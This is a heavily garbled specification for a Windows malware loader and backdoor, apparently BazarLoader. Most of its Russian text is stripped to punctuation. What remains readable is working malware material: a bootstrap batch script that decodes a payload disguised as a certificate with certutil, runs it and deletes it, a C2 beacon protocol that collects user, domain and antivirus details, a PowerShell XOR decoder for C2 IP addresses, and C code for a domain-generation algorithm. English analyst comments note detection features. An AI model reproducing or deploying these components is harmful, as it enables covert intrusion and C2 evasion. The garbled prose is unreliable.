 
 

   ,   :
-   ( -   100)
-     Windows   Windows 2008/Windows Vista
       (js, powershell v2.0),     C/C++
-     ,       UAC

"" ,         ,    .
  ,          - .
   -    .

        ,     .
         (  18, . .).
              ( .     - ).

 :
-     ,      (   , ,  , .)
-   ,      
-          
-     ,  .  - XOR 1 ,  -   UTC   YYYYMMdd,   hex
  20200128 -  hex- 3230323030313238 (    16- )
     UTC,          
-     ,        
-    fileless- - process hollowing, process doppelganging,    dll  ,   ,
   ,    
-    

             
  .

     ,    ,     
(process hollowing/process doppelganging)     .

     .dll:
-      ,     .
  ,    .dll -  DllMain(DLL_PROCESS_ATTACH)

     ,        (inetcpl.cpl ->  ->  -).

,   :
-   .bazar  Emercoin       
-  .     ,   .       ( )
(       HEAD /update HTTP/1.1   X-Tag)

        .exe-.
      -   .exe-  ,   ,
 WMI .
,    :
-         :
 .txt-,  , ,     , .cab-, 
-  ,     
-   .exe,  bootstrap- (.bat-),     
     .exe   
- bootstrap-     ""  

 (   ,    ), bootstrap.bat:

@echo off
REM Bootstrap stage: certutil -decode base64-decodes the "certificate" carrier (file.crt) into a PE (file.exe).
REM Detection note: certutil invoked with -decode on a non-certificate input is a well-known LOLBin signal.
certutil -decode file.crt file.exe
REM Launch the decoded payload.
file.exe
REM Delay: ping -n 300 against localhost is the usual cmd.exe stand-in for a ~5-minute sleep.
ping -n 300 127.0.0.1 > NUL
REM Self-clean step: delete the dropped executable after it has run.
del /f /y file.exe

             .

   /++,    CMake,         Microsoft ,
 mingw, clang.


 

                   .
     SinkHole        .

 HTTP-   HTTP-      , :
Date: YYYY-MM-dd HH:mm:ss

*  
 HTTP-    Set-Cookie:    SID    base64-.
      ( !)

*  
      HTTP- .
      ,   .
        (     ,   ,
 DPI-   ).

   ,   ( )    ,   .

          .
  ,          .
          .

  .


 

           ,      .

1.   HTTP-     Date      
2.  /      .      
3. /     (  "Date: "       ),   base64  ,
     .
 Cookie,   -       X-     (.. ,    ).
4.    ,     .


  C&C   

      :
1.  "" IP-
2. -   ()  Emercoin
3.        (   .bazar)
  .3  ,        ,
        ,
           ( - ).
   .
   3      5000    .
     1.
    1..3,         .

          (.).
  ,  .

          3  ,   ,     
(  ).

  IP-   Emercoin,   IP-   XOR 254   .
, 124.245.101.251 (  DNS-) -> 130.11.155.5
.. DNS-  ,         DNS- .

  ipxor.ps1  PowerShell:
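# ipxor.ps1 - decode (or encode) an IP address whose octets were XORed with 254.
# The page describes C2 addresses published in DNS with every octet XORed with
# 254; XOR is its own inverse, so the same transform maps the DNS value back to
# the real address (e.g. 124.245.101.251 -> 130.11.155.5) and vice versa.
# Usage: run interactively; prompts for a dotted-quad and prints both forms.
# Inputs that are not four decimal octets in 0..255 fail on the [byte] cast.
$ip = read-host -prompt "Enter IP";
write-host $ip;
# Cast each octet to [byte] so the XOR is performed on an 8-bit value, then
# re-join with '.' as the separator. The original accumulated the string with
# -join($newip,'.',$octet), which emits a leading '.' (".130.11.155.5").
$octets = $ip.split('.') | foreach { ([byte] $_) -bxor 254 };
$newip = $octets -join '.';
write-host $newip;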


 

HEAD / HTTP/1.1
 
    X-Tag,   ,     .
 ,           .

GET / HTTP/1.1

     .
 - XOR 1 ,  -   UTC   YYYYMMdd,   hex
  20200128 -  hex- 3230323030313238 (    16- )

POST / HTTP/1.1

     GET,     .
        .

  .     !

    POST     .
 -       ,    !   .
  :
path=      (    fileless )
os=3-7   major-version, minor-version  build  ,     
(,  6.1 build 7600   617600).
os[1]=   (W=Windows)   
os[2]= 
arch= (): 86  64
cname= 
uname= 
domain=         WinAPI,  NetWkstaGetInfo;    !)
av[]= 
ps= 




 : https://habr.com/ru/post/425177/
  Emercoin .

 1
     

   ,    ,        .
  s .bazar

/*
 * DGA helper: writes a 12-character lowercase label plus a NUL terminator
 * into `domain`. The caller must supply at least 13 bytes (domain[12] is
 * written). A NULL `domain` is a no-op.
 *
 * Layout as the code below shows:
 *   domain[0..5]  - derived from rand(); no srand() is visible in this block,
 *                   so seeding (and reproducibility) depends on the caller.
 *   domain[6..11] - domain[0..5] each shifted by one digit of a 6-digit date
 *                   string that is computed once per process and cached.
 *
 * Analyst note: rand() % ('z' - 'a') is 0..24, dividing by 6..11 leaves at
 * most 4, and i*2 adds at most 10, so the first half is confined to 'a'..'m';
 * the second half adds a single decimal digit (0..9), so every character is
 * in 'a'..'v'. Such a narrow alphabet is a usable detection feature.
 */
void get_possible_domain(char* domain) {
    if (!domain)
        return;

    /* First six characters: 'z' - 'a' is 25, so only 25 residues are used;
       the divisor grows with the position and i*2 shifts later slots up. */
    for (int i = 0; i < 6; ++i) {
        int rndchr = rand() % ('z' - 'a');
        rndchr /= i + 6;
        char c = 'a' + rndchr + i*2;
        domain[i] = c;
    }

    /* Date component: computed on the first call and cached for the process
       lifetime; `date` ends up as "%.2d" + a 4-digit year = 6 chars + NUL. */
    static char datebuf[24];
    static char date[7];
    static bool date_computed = false;

    if (!date_computed) {
        /* NULL format with LOCALE_INVARIANT; the slicing below assumes a
           MM/dd/yyyy layout (month at [0..1], year at [6..9]). The return
           value is not checked. */
        GetDateFormatA(LOCALE_INVARIANT, 0, NULL, NULL, datebuf, sizeof(datebuf));
        char mon[3];
        char year[5];

        for (int i = 0; i < 2; ++i)
            mon[i] = datebuf[i];
        mon[2] = 0;

        for (int i = 0; i < 4; ++i)
            year[i] = datebuf[i + 6];
        year[4] = 0;
        /* Seed string is (12 - month), zero-padded to two digits, followed by
           (year - 18): e.g. January 2020 -> "112002". The value therefore
           changes with the calendar month, but only on the first call of a
           given process because of the cache above. */
        sprintf_s(date, sizeof(date), "%.2d%d", 12 - atoi(mon), atoi(year) - 18);
        date_computed = true;
    }

    /* Second six characters: shift each first-half letter by the matching
       date digit (date[k] - '0' is 0..9). Given the ranges noted in the
       header the sum is always >= 'a', so the 'z' fallback looks unreachable;
       there is no check for exceeding 'z' either, which the 'a'..'v' bound
       makes unnecessary. */
    for (int i = 6; i < 12; ++i) {
        domain[i] = domain[i - 6] + date[i - 6] - '0';
        if (domain[i] < 'a')
            domain[i] = 'z';
    }

    domain[12] = 0;
}
